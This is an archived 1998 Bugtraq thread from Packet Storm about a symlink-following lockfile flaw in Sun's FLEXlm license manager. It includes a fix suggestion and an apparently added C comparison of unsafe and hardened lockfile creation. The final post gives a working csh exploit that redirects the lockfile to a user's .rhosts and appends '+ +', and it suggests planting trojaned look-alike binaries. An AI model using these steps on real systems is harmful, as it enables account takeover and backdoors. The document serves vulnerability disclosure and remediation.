sol2.51-6.lockfiles.txt

1999-08-17T00:00:00
ID PACKETSTORM:15311
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

Date: Wed, 21 Oct 1998 20:22:38 +0200  
From: Joel Eriksson <na98jen@STUDENT.HIG.SE>  
To: BUGTRAQ@netspace.org  
Subject: License Manager's lockfiles (Solaris 2.5.1)  
  
License Manager on Solaris 2.5.1 tends to make stupid lockfiles owned by  
root and mode 666 (world-writable). That is not good, since anyone could  
create root-owned files which they then would be able to modify. It's an  
even bigger problem since it just takes about a minute 'til the lockfile  
is created after it's replaced with a symlink which it follows ..  
  
Btw, if this is an old bug, I apologize. It's dead simple so I would be  
surprised if it's not.. :-P Well, anyway..  
  
On the system I am on it looks like this:  
  
bash$ ls -l /var/tmp/lock*  
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI  
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd  
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta  
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd  
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd  
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd  
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd  
  
And:  
  
bash$ ls -l /var/tmp/.flexlm  
total 2  
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211  
  
I tested the bug by removing lockESRI and making a symlink to  
/var/tmp/test, in about a minute the file was created, owned by root and  
world-writable.  
  
At first I didn't know where the bug was located but managed to find out  
by looking in the licenses_combined file that was passed as an option to  
the programs with the lockfiles. After some research I realised that the  
licenses_combined file was used by /opt/SUNWste/license_tools/lmgrd.ste  
that runs on the system I'm on.  
  
With strings I found the /usr/tmp/.flexlm (/usr/tmp is a symlink to  
/var/tmp). I have not tried symlinking lmgrd.211 (211 = lmgrd.ste's PID)  
but I guess it's exploitable too, if you can predict the PID (which  
probably isn't that hard when it's run from rc-scripts or similar on boot).  
  
There is also a frequent use of temporary files in the  
/opt/SUNWste/license_tools/config_template which also could be a  
security risk, at least if you can predict when the script is run ..  
Race conditions.  
  
/Joel Eriksson  
  
---------------------------------------------------------------------  
  
Date: Fri, 23 Oct 1998 14:56:07 -0700  
From: pedward@WEBCOM.COM  
To: BUGTRAQ@netspace.org  
Subject: Re: License Manager's lockfiles (Solaris 2.5.1)  
  
>  
> bash$ ls -l /var/tmp/.flexlm  
> total 2  
> -rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211  
>  
> I tested the bug by removing lockESRI and making a symlink to  
> /var/tmp/test, in about a minute the file was created, owned by root and  
> world-writable.  
>  
  
Try creating a wrapper shell script that sets the umask before launching  
the license manager. If you set it properly, they won't be world writable  
(providing that the LM uses open(filename, O_EXCL | O_CREAT)).  
  
This *sounds* like a simple misuse of the open syntax.  
  
>  
> /Joel Eriksson  
>  
  
--Perry  
  
--  
Perry Harrington System Software Engineer zelur xuniL ()  
http://www.webcom.com perry.harrington@webcom.com Think Blue. /\  
  
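Perry's fix (a restrictive mode plus O_EXCL) and the symlink-following open() Joel describes, shown side by side as an added C example. This is illustrative code written for this page, not FLEXlm's or Sun's; the function names, the private /tmp demo directory and the "victim" target path are constructed for the demonstration and need no root privileges.

```c
#define _GNU_SOURCE               /* O_NOFOLLOW, mkdtemp */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the thread describes: mode 0666 and no O_EXCL, so open()
 * follows a symlink planted at the lock path and creates its target. */
int lockfile_create_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form: O_EXCL|O_NOFOLLOW never creates through an existing name
 * or symlink, an explicit 0644 ignores a permissive umask, and fstat/lstat
 * confirm the descriptor is the plain file at that path, not a swap-in. */
int lockfile_create_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;               /* EEXIST or ELOOP on a symlink */
    struct stat fs, ls;
    if (fstat(fd, &fs) || lstat(path, &ls) || !S_ISREG(ls.st_mode) ||
        fs.st_ino != ls.st_ino || fs.st_dev != ls.st_dev ||
        (fs.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd); unlink(path); errno = EPERM; return -1;
    }
    return fd;
}

/* Constructed scenario in a private temp dir: a symlink sits where the lock
 * should be. Bit 1 = safe creator refused it, bit 2 = unsafe one followed it. */
int run_demo(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX", lock[64], target[64];
    int score = 0, fd;
    if (!mkdtemp(dir)) return -1;
    snprintf(lock, sizeof lock, "%s/lockdemo", dir);
    snprintf(target, sizeof target, "%s/victim", dir);
    if (symlink(target, lock) != 0) { rmdir(dir); return -1; }
    if (lockfile_create_safe(lock) < 0 && (errno == EEXIST || errno == ELOOP))
        score |= 1;                          /* refused the planted symlink */
    if ((fd = lockfile_create_unsafe(lock)) >= 0 && !close(fd) &&
        access(target, F_OK) == 0)
        score |= 2;                          /* followed it: target now exists */
    unlink(target); unlink(lock); rmdir(dir);
    return score;
}
```

run_demo() returns 3 on a system where open() follows a dangling symlink for creation, which is exactly the behaviour the thread reports.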
---------------------------------------------------------------------  
  
Date: Fri, 23 Oct 1998 20:22:03 -0400  
From: Roger Harrison <rharri01@KEPLER.POLY.EDU>  
To: BUGTRAQ@netspace.org  
Subject: Re: License Manager's lockfiles (Solaris 2.5.1)  
  
On Wed, 21 Oct 1998, Joel Eriksson wrote:  
  
> License Manager on Solaris 2.5.1 tends to make stupid lockfiles owned by  
> root and mode 666 (world-writable). That is not good, since anyone could  
> create root-owned files which they then would be able to modify. It's an  
> even bigger problem since it just takes about a minute 'til the lockfile  
> is created after it's replaced with a symlink which it follows ..  
  
I discovered this a few months ago and neglected to post it.  
Solaris 2.6 is affected as well. A lock file locksuntechd is created  
in /tmp mode 666 owned by root and group root. I think the program is  
lmgrd FLEXlm v2.26d that is causing the problems, either that or suntechd.  
  
%ls -la /tmp/locksuntechd  
-rw-rw-rw- 1 root root 0 Oct 22 12:51 locksuntechd  
  
suntechd is in /opt/SUNWspro/SunTech_License/bin/  
  
there is a log file that contains some stuff about when the daemon is  
going up or down and also if users are exploiting it you can see entries  
about the lock file not being available. It is in  
/opt/SUNWspro/SunTech_License/license.log  
  
So to exploit it, just remove the locksuntechd file and replace it with a  
symlink to a file you want to create. It will not overwrite existing  
files from the testing that I did. Then the link is followed and the new  
file is created with mode 666 ownership root. You can then delete the  
symlink and create a new one to somewhere else and it will work again and  
again and again...what fun. Users could create .rhosts files, new system  
webpages, new trojan binaries with names spelled slightly off that get  
misspelled often (finger-fineger, pine-pien, ls-sl) come on.. tell me  
you never typed one of those out wrong while you were typing fast!  
  
------  
#!/bin/csh -f  
# Change target user name before running  
# Iconoclast@thepentagon.com 10/98  
rm /tmp/locksuntechd  
ln -s ~targetuser/.rhosts /tmp/locksuntechd  
exit  
------  
then wait a min and cat + + >> ~targetuser/.rhosts  
  
that's all for now...  
  
-Iconoclast  
iconoclast@thepentagon.com  
  
shout-outs to segv and timespace  